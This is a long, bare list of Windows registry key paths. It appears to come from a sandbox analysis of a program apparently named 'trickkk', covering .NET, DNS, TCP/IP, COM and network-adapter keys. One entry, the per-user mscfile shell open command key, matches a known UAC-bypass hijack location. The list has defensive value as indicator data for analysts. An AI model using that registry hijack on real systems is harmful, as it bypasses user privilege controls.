HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\141dfd70\6b79efab\4b\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\863BC3C7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\trickkk_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data
